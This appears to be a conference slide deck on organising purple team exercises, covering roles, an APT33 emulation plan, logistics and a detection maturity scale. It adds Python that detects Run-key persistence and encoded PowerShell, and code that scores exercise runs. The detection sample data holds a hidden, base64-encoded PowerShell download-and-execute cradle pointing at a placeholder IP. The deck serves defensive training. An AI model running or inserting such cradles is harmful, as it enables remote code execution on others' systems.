@JORGEORCHILLES
Purple Team Exercises
GRIMMCon
@JorgeOrchilles
T1033 - System Owner/User Discovery
● Chief Technology Officer - SCYTHE
● C2 Matrix Co-Creator
● 10 years @ Citi leading offensive security team
● Certified SANS Instructor: SEC560, SEC504
● Author SEC564: Red Team Exercises and Adversary Emulation
● CVSSv3.1 Working Group Voting Member
● GFMA: Threat-Led Pen Test Framework
● ISSA Fellow; NSI Technologist Fellow
Purple… how hard can it be?
Red and Blue just work together...
How we think it will go
How it may go
Agenda
● Ethical Hacking Evolution
● Goals
● Sponsors and Roles
● Framework/Methodology
● Cyber Threat Intelligence
● Attack Infrastructure
● Team Prep
● Kick Off
● Exercise Flow
● Wrap Up
Ethical Hacking Evolution
● Common Vulnerabilities and Exposures (CVE) != Tactics, Techniques, and Procedures (TTPs)
● Mature organizations operate under “Assume Breach”
○ Some vulnerability will not be patched before it is exploited
○ Some user will fall for social engineering and execute a payload or provide credentials
○ What do we do then?
● Testing technology is not enough: People, Process, and Technology
Red Team
● Definition:
○ Test Assumptions
○ Emulate Tactics, Techniques, and Procedures (TTPs) to test people, processes, and technology
● Goal:
○ Make Blue Team better
○ Train and measure whether blue teams' detection and response policies, procedures, and technologies are effective
● Effort:
○ Manual
● Frequency:
○ Intelligence-led (new exploit, tool, or TTP)
● Customer:
○ Blue Teams
“The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997
https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
Red Teams
Internal Red Teams
● Repeated engagements
○ Keep finding the same thing
○ Remediation retesting
● Use privileged/insider knowledge
● Sparring partner
External Red Team
● Offers new perspective
○ May have other industry
experience
● “Snapshot” engagements
○ Generate report based on
limited window
Adversary Emulation
● Definition:
○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries
○ May be non-blind, a.k.a. Purple Team
● Goal:
○ Emulate an adversary attack chain or scenario
● Effort:
○ Manual; SCYTHE is changing that
● Customer:
○ Entire organization
https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
TOWARD A PURPLE TEAM
Purple Team Exercises
● Virtual, functional team where teams work together to measure and improve defensive security posture
○ CTI identifies a threat actor with the capability, intent, and opportunity to attack the organization
○ Red Team creates an adversary emulation plan
○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses
○ Emulation of each adversary behavior (TTP)
○ Blue Team looks for indicators of behavior
○ Red and Blue work together to create a remediation action plan
● Repeat exercises to measure and improve people, process, and technology
Purple Team Goals
● Emulate an attack against a target organization
● Obtain a holistic view of target organization
● Measure people, process, and technology
● When to do In Person Purple Team?
○ Prior to a blind Adversary Emulation
○ After a blind Adversary Emulation as “Replay”
○ To train new team members
○ Periodic training for certain operational locations
○ To chain TTPs (Attack Patterns) that have previously been documented
● Operationalize Purple Team
○ Test new TTPs based on Threat Intelligence
Sponsors
● Approve
○ Exercise
○ Scope
○ Budget
● Members of various teams pulled out of business-as-usual (BAU) work:
○ Cyber Threat Intelligence
○ Red Team
○ SOC
○ Hunt Team
○ Incident Response
○ Forensics
Time Requirements
● Purple Team Exercises can run for 1-5 days of mostly hands-on-keyboard work between the Red Team and Blue Teams
● Preparation time depends on the defined goals, the guidance or constraints set by Sponsors, and the emulated adversary’s TTPs

Phase        | Duration
Preparation  | 1-4 Weeks
Exercise     | 1-5 Days
Action Items | Undefined
Roles and Responsibilities
Title                             | Role                     | Responsibility
CISO/Head of Information Security | Sponsor                  | Approve Exercise and Budget
Red Team Manager                  | Sponsor & Attendee       | Define Goals, Select Attendees, Select TTPs
SOC Manager                       | Sponsor & Attendee       | Define Goals, Select Attendees, Select TTPs
Incident Response Manager         | Sponsor                  | Define Goals, Select Attendees, Select TTPs
CTI Analyst                       | Sponsor                  | Define Goals, Select TTPs
Participants                      | Attendees                | Prepare, Attend, Action Items
Exercise Coordinator              | 1-2 Operational Managers | Lead Preparation Phase activities, participate in or observe the exercise, and own the Lessons Learned document. Record minutes, notes, action items, and feedback. Send daily emails with those notes as well as the plan for the next day.
Framework & Methodology
● Cyber Kill Chain – Lockheed Martin
● Unified Cyber Kill Chain – Paul Pols
● Financial/Regulatory Frameworks
○ CBEST Intelligence Led Testing
○ Threat Intelligence-Based Ethical Red Teaming
○ Red Team: Adversarial Attack Simulation Exercises
○ Intelligence-led Cyber Attack Simulation Testing
○ A Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry
● Testing Framework: MITRE ATT&CK (https://attack.mitre.org/)
Threat Intelligence
● Pyramid of Pain – David Bianco: http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
● Figure: Pyramid of Pain annotated with example indicators, from least to most painful for the adversary
○ Hash Value
○ IP Address
○ Tools: S0129 – AutoIT; S0194 – PowerSploit; S0002 – Mimikatz; S0192 – Pupy
○ TTPs: T1068 – Exploitation for Privilege Escalation; T1003 – Credential Dumping; T1086 – PowerShell
ATT&CK Navigator
#ThreatThursday
● Weekly Adversary
○ Introduce Adversary
○ Consume CTI and map to MITRE ATT&CK
○ Present Adversary Emulation Plan
○ Share the plan on SCYTHE Community Threat Github:
■ https://github.com/scythe-io/community-threats/
○ Emulate Adversary
○ How to defend against adversary
● All updated here: https://www.scythe.io/threatthursday
All about the TTPs
● Planning is extremely important
● Choose TTPs that are:
○ Not prevented
○ Logged
○ Detected
○ Alerted
● Focus is on improving people and process
Tabletop TTPs with Managers
● Identify the controls expected for those TTPs and which teams should have visibility of the TTP activity
● Create a table showing expected outcomes per team:

Procedure | Technique    | Tactic    | Detection  | SOC / Hunt / IR
<TTP1>    | <Technique1> | <Tactic1> | <Control1> | x x x
<TTP2>    | <Technique2> | <Tactic2> | <Control2> | x x
<TTP3>    | <Technique3> | <Tactic3> | <Control3> | x x
<TTP4>    | <Technique4> | <Tactic4> | <Control4> | x x
Determine Tools to Use - C2 Matrix
● Google Sheet of C2s
● https://www.thec2matrix.com/
● Find ideal C2 for your needs
● https://howto.thec2matrix.com
● SANS Slingshot C2 Matrix VM
● @C2_Matrix
Create Adversary Emulation Plan
APT33
Description: APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations in the United States, Saudi Arabia, and South Korea, in multiple industries including governments, research, chemical, engineering, manufacturing, consulting, finance, telecoms, and several other sectors.
Objective: Establishing persistent access to partners and suppliers of targets; mounting supply chain attacks
Command and Control: T1043 - Commonly Used Port: Ports 80 and 443; T1071 - Standard Application Layer Protocol: HTTP and HTTPS; T1032 - Standard Cryptographic Protocol; T1065 - Uncommonly Used Port: Ports 808 and 880
Initial Access: T1192 - Spearphishing Link; T1110 - Brute Force; T1078 - Valid Accounts
Execution: T1204 - User Execution; T1203 - Exploitation for Client Execution
Defense Evasion: T1132 - Data Encoding; T1480 - Execution Guardrails: Kill dates in payload; T1027 - Obfuscated Files or Information; T1086 - PowerShell
Discovery: T1040 - Network Sniffing
Privilege Escalation: T1068 - Exploitation for Privilege Escalation
Persistence: T1060 - Registry Run Keys / Startup Folder; T1053 - Scheduled Task
Credential Access: T1003 - Credential Dumping: Publicly available tools like Mimikatz
Exfiltration: T1002 - Data Compressed; T1048 - Exfiltration Over Alternative Protocol
Note: the technique IDs are the pre-sub-technique ATT&CK IDs current when this plan was written (mid-2020); several of them, such as T1086 and T1060, have since been retired or moved under sub-techniques, so map them before reusing the plan.
https://www.scythe.io/library/threatthursday-apt33
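As an added example (not code from the deck, from SCYTHE, or from the APT33 plan itself), the following Python shows what the SOC side of the tabletop looks like in code for two TTPs in the plan above: detection logic for T1060 (a value written under a Run/RunOnce key) and for T1086 together with T1132 (PowerShell launched with a base64 -EncodedCommand), run over constructed Sysmon-style Event ID 1 (ProcessCreate) and Event ID 13 (RegistryEvent: Value Set) records. The field names follow Sysmon's schema; the records, the SID, the 203.0.113.10 address and the `encode_ps` helper are assumptions made for the example. The helper is also how the Red Team can build the encoded command for the Adversary Emulation Manual, so the same block serves the preparation step.

```python
import base64
import re

# Autostart locations behind T1060 (Registry Run Keys / Startup Folder), matched
# case-insensitively inside a Sysmon TargetObject such as
# HKU\<SID>\Software\Microsoft\Windows\CurrentVersion\Run\<value>.
RUN_KEY_RE = re.compile(
    r"\\Software\\Microsoft\\Windows\\CurrentVersion\\(Run|RunOnce)\\", re.IGNORECASE
)
# powershell.exe -e / -ec / -enc / -EncodedCommand <base64>  (T1086 + T1132).
ENCODED_FLAG_RE = re.compile(
    r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE
)


def encode_ps(script):
    """Build the -EncodedCommand argument the way PowerShell expects it:
    base64 over the UTF-16LE bytes of the script."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline):
    """Return the script hidden in a -EncodedCommand argument, or None if the
    command line has no such flag or the payload is not valid UTF-16LE base64."""
    m = ENCODED_FLAG_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def detect(event):
    """Map one Sysmon-style event to the ATT&CK technique IDs from the APT33 plan
    it evidences. Returns a list of (technique_id, reason); empty when benign."""
    hits = []
    if event["EventID"] == 13 and RUN_KEY_RE.search(event.get("TargetObject", "")):
        hits.append(("T1060", "value set under autostart key: " + event["TargetObject"]))
    if event["EventID"] == 1 and event.get("Image", "").lower().endswith("powershell.exe"):
        decoded = decode_encoded_command(event.get("CommandLine", ""))
        if decoded is not None:
            hits.append(("T1086", "PowerShell -EncodedCommand decodes to: " + decoded.strip()))
            hits.append(("T1132", "base64-encoded command line"))
    return hits


def triage(events):
    """Run detect() over a batch and return only the events that matched, as
    (index, hits) pairs: the evidence the SOC puts on screen in step 5."""
    matched = []
    for i, event in enumerate(events):
        hits = detect(event)
        if hits:
            matched.append((i, hits))
    return matched


# Constructed records (not real telemetry). SID and IP address are placeholders.
SID = "S-1-5-21-1111111111-2222222222-3333333333-1001"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc "
     + encode_ps("IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a')")},
    {"EventID": 13, "Image": r"C:\Windows\System32\reg.exe",
     "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Run\Updater" % SID,
     "Details": r"C:\Users\Public\update.exe"},
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"EventID": 13, "Image": r"C:\Windows\explorer.exe",
     "TargetObject": r"HKU\%s\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden" % SID},
]

if __name__ == "__main__":
    for idx, hits in triage(SAMPLE_EVENTS):
        for tid, reason in hits:
            print(f"event[{idx}] {tid}: {reason}")
```

The two benign records (a signed-script PowerShell launch and an Explorer preference write) are there on purpose: a detection that fires on every powershell.exe or every HKU write is what produces the "events centrally, no alert" outcome in the maturity scale later in the deck, so the check is scoped to the encoded flag and to the autostart key path.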
Logistics
● Pick a location
● Virtual or in person?
○ Virtual: Choose a platform (Zoom, GoToMeeting, etc.)
○ In person: SOC locations are ideal as SOC Analysts, Hunt Team, and Incident Response are generally physically present
■ Obtain travel approval from sponsors
■ Plan to arrive a day early
■ Training room or large conference room
● Each attendee should have a workstation with media output or screen sharing to show their current screen to the other participants
Target Systems
Provision production systems for the exercise that are representative of the organization (same builds and security tooling as the rest of the fleet)
● Endpoint Operating Systems
○ Windows 7 through 10 – multiple hosts
○ Terminal Services/Citrix
● Server Operating Systems
○ Windows Servers
○ *nix Servers
● Consider physical, virtual, VDI, and cloud servers
Security Tools
Request the target systems have production security tools:
● Anti-Virus/Anti-Malware
● Anti-Exploit
● Endpoint Detection & Response
● Forensic Tools
○ Image acquisition
○ Live forensics
Target Accounts
Create service or secondary accounts for logging into systems, accessing the Internet, and receiving email, so that real production credentials are not compromised during the exercise
● Request a secondary account for a standard user
● Request standard email access
● Request Internet access
● Add the accounts as local administrator on some target systems
Attack Infrastructure
● Choose and procure an external hosting provider
● Create internal and Internet-facing virtual machines
○ Only allow connections from the organization's proxies and Red Team IP addresses
○ Obtain the external IP address of the Internet line at the event location and add it to that allow-list
○ Build credential theft sites or payload delivery sites
○ Set up C2 infrastructure based on the payloads and TTPs
● Ensure SMTP servers allow sending emails into the organization
● Purchase domains and TLS certificates
● Provide IP addresses and domains to the SOC for allowing access
● Ensure the systems are allowed through any Network Access Controls
Red Team Preparation
● Set up at least 2 laptops to show the attack activity live
● Ensure Attack Infrastructure is fully functional
● Ensure Target Systems are fully functional
● Document all commands required to emulate TTPs (Adversary Emulation Manual)
● Set up resource scripts (or the framework equivalent) to generate payloads and start handlers
● Test TTPs before the exercise on hosts different from the exercise hosts but configured alike
Use VECTR
SOC/Hunt Team Preparation
● Validate that the security tools on the target systems are reporting to the SOC production tools
● Allow-list the Red Team C2 domains on the proxy
● Ensure TLS decryption is enabled for the Red Team domains so the C2 traffic is visible
● Verify the allow-list
● Work with the Red Team during testing of payloads and C2 prior to the exercise
● Ensure laptops or workstations have access to all tools for showing on the large screen in the exercise location
Incident Response Preparation
● Create an IR case/ID
○ This allows tagging artifacts and following normal processes without flagging any suspicious activity, e.g. pulling memory from a system that does not have a formal case
● Ensure the correct forensic tools are deployed on the target systems
● Consider any way to speed up the BAU process
● Install live forensic tools for efficiency
○ Sysmon
○ Process Monitor (Procmon)
Kick Off the Exercise
● Sponsor kicks off the exercise
● Motivate the attendees
● Go over the flow of the exercise
Exercise Flow
1. Red Team presents the TTP and technical details
○ Attack Vector
○ Delivery Method
○ User Interaction
○ Privilege gained
○ Tool or exploit used
2. Purple Team discussion of controls based on delivery method
○ SOC: Any logs or alerts for this TTP
○ Hunt Team: Any Hunt Cases for this TTP
○ Incident Response: Documented methods to identify if TTP was leveraged
3. Red Team executes the TTP
○ Provides attacker IP address
○ Provides target
○ Provides exact time
○ Shows the attack on projector
4. SOC, Hunt, and IR follow their process to identify evidence of the TTP
○ Time-box this step so expectations are met and the exercise keeps moving
Measure Detection Maturity
0. Emulation does not generate events
1. Emulation generates events locally
2. Emulation generates events centrally (no alert)
3. Emulation triggers an alert
4. Emulation triggers the response process
Shout out to @mvelazco for above
See his DerbyCon Talk “I sim(ulate), therefore I catch”
Exercise Flow (continued)
5. Show on screen whether the TTP was identified: logs received, alert fired, or forensic data found
a. Time to detect and/or time to receive alert
b. Red Team stops TTP
6. Document what worked and what did not
7. Are there any short-term adjustments that can increase visibility?
a. Implement adjustment
b. Red Team re-runs TTP
8. Document any Action Items
9. Repeat flow for the next TTP
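Steps 3 through 8 above, scored in code as an added example (this is not VECTR, SCYTHE, or code from the deck): each TTP run gets the 0-4 level from the "Measure Detection Maturity" slide derived from the evidence the Blue Team actually found, a time-to-detect measured from the Red Team's stated execution time, and a gap list naming the teams the tabletop table expected to have visibility but which saw nothing; a re-run after a step 7 adjustment is scored separately so the improvement shows up next to the original result. The record fields (observed, expected_teams, teams_with_visibility, rerun_observed), the evidence kinds, and the three sample runs are constructed for the example.

```python
from datetime import datetime

# Maturity scale from the "Measure Detection Maturity" slide (@mvelazco).
LEVELS = {
    0: "emulation does not generate events",
    1: "events generated locally",
    2: "events generated centrally (no alert)",
    3: "alert triggered",
    4: "response process triggered",
}
# Evidence kinds the Blue Team reports in step 5, ranked by the level each one proves.
EVIDENCE_RANK = {"local": 1, "central": 2, "alert": 3, "response": 4}


def maturity_level(observed):
    """Highest level on the 0-4 scale supported by what the Blue Team found."""
    return max((EVIDENCE_RANK[kind] for kind in observed), default=0)


def time_to_detect_min(executed_at, detected_at):
    """Minutes from the Red Team's stated execution time (step 3) to the moment
    the Blue Team identified it (step 5a); None if it was never identified."""
    if detected_at is None:
        return None
    return round((detected_at - executed_at).total_seconds() / 60, 1)


def score_ttp(run):
    """Score one TTP run. 'expected_teams' comes from the tabletop table; 'gaps'
    are the teams that expected visibility but saw nothing on the first run.
    'rerun_observed' is present only when step 7 (adjust and re-run) happened."""
    rerun = run.get("rerun_observed")
    return {
        "technique": run["technique"],
        "level": maturity_level(run["observed"]),
        "level_after_adjustment": maturity_level(rerun) if rerun is not None else None,
        "ttd_min": time_to_detect_min(run["executed_at"], run.get("detected_at")),
        "gaps": sorted(set(run["expected_teams"]) - set(run["teams_with_visibility"])),
    }


def score_exercise(runs):
    return [score_ttp(run) for run in runs]


def action_items(scores):
    """Step 8: one action item per visibility gap, plus one per TTP whose final
    level is still below 'alert', because a detection still has to be built."""
    items = []
    for s in scores:
        final = s["level_after_adjustment"] if s["level_after_adjustment"] is not None else s["level"]
        for team in s["gaps"]:
            items.append(f"{s['technique']}: {team} expected visibility in the tabletop but saw nothing")
        if final < 2:
            items.append(f"{s['technique']}: level {final}, telemetry never reaches the central tools")
        elif final < 3:
            items.append(f"{s['technique']}: level {final}, events are central but nothing alerts")
    return items


def render(scores):
    """Lines for the on-screen summary in step 5: technique, level, TTD, gaps."""
    lines = ["Technique | Level | TTD (min) | Gaps"]
    for s in scores:
        lvl = str(s["level"])
        if s["level_after_adjustment"] is not None:
            lvl += f" -> {s['level_after_adjustment']}"
        ttd = "never" if s["ttd_min"] is None else str(s["ttd_min"])
        lines.append(f"{s['technique']} | {lvl} | {ttd} | {', '.join(s['gaps']) or '-'}")
    return lines


# Constructed records for three TTPs from the APT33 plan; the times are made up.
T0 = datetime(2020, 7, 20, 10, 0)
SAMPLE_RUNS = [
    {"technique": "T1086 PowerShell (encoded command)", "executed_at": T0,
     "detected_at": T0.replace(minute=12), "observed": {"local", "central", "alert"},
     "expected_teams": ["SOC", "Hunt"], "teams_with_visibility": ["SOC", "Hunt"]},
    {"technique": "T1060 Registry Run Key", "executed_at": T0.replace(hour=11),
     "detected_at": T0.replace(hour=11, minute=40), "observed": {"local", "central"},
     "expected_teams": ["SOC", "Hunt", "IR"], "teams_with_visibility": ["Hunt"],
     "rerun_observed": {"local", "central", "alert"}},  # a rule was added and the TTP re-run
    {"technique": "T1003 Credential Dumping", "executed_at": T0.replace(hour=13),
     "detected_at": None, "observed": set(),
     "expected_teams": ["SOC", "IR"], "teams_with_visibility": []},
]

if __name__ == "__main__":
    scores = score_exercise(SAMPLE_RUNS)
    print("\n".join(render(scores)))
    for item in action_items(scores):
        print("ACTION:", item)
```

Keeping the first-run level and the post-adjustment level as separate fields matters for the Lessons Learned document: the first number is the organization's real posture on the day, the second is what a short-term fix bought, and the action item for a gap team stays open even when the re-run alerted, because the team that should have seen it still did not.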
Exercise Closure
● At least one dedicated Exercise Coordinator should be assigned to take minutes, notes, action items, and feedback
● Daily emails should be sent to all attendees and sponsors with minutes, action items, and the plan for the next day
● The Exercise Coordinator is responsible for the creation of a Lessons Learned document following each exercise
● A feedback request should be sent to all attendees on the last day of the Purple Team Exercise to obtain immediate feedback, while it is fresh in attendees’ minds
● Lessons Learned documents should be completed and sent to Sponsors and Attendees less than 30 days after the exercise has concluded
UniCon: August 20, Save the Date!!!
https://zoom.us/webinar/register/3815947366418/WN_b4Bm9E5BSi2rhACLwiaJGw
Thank you!
Questions?
What is SCYTHE?
● Enterprise-Grade platform for Adversary Emulation
○ Creating custom, controlled, synthetic malware
○ Can be deployed on-premises or your cloud
● Emulate known threat actors against an enterprise network
○ Consistently execute adversary behaviors
○ Continually assess security controls
○ Decreased evaluation time of security technologies
○ Identify blind spots for blue teams
○ Force-multiplier for red team resources
○ Measure and improve response of people and process
Features & Capabilities
● Trivial installation
● Enterprise C2
○ HTTP(S), DNS, SMB
○ Google, Twitter, Stego
● Automation
○ Build cross-platform synthetic malware via dashboard
○ Synthetic malware emulates chosen behaviors consistently
● Delivery methods
○ Web Page/Drive-by (T1189)
○ Phishing Link (T1192)
○ Phishing Attachment (T1193)
● Reports
○ HTML Report, CSV Report, Executive Report and Technical Report
○ Mapped to MITRE ATT&CK
● Integrations
○ PlexTrac - automated report writing and handling
○ Integrated with SIEMs (Splunk and Syslog)
○ Red Canary’s Atomic Red Team test cases
○ RedELK and VECTR integration in progress
Architecture
What’s Next?
● SCYTHE v3 Released July 7, 2020
○ Virtual File System
○ Threat Automation language
■ Structured Data out of Unstructured Data
■ Use results of one action for the next action
● Module SDK
○ Python and Native
○ In-memory loading techniques
● Marketplace
○ Ecosystem of third party contributors
○ Create custom modules
○ Request custom modules - TTP Bounty
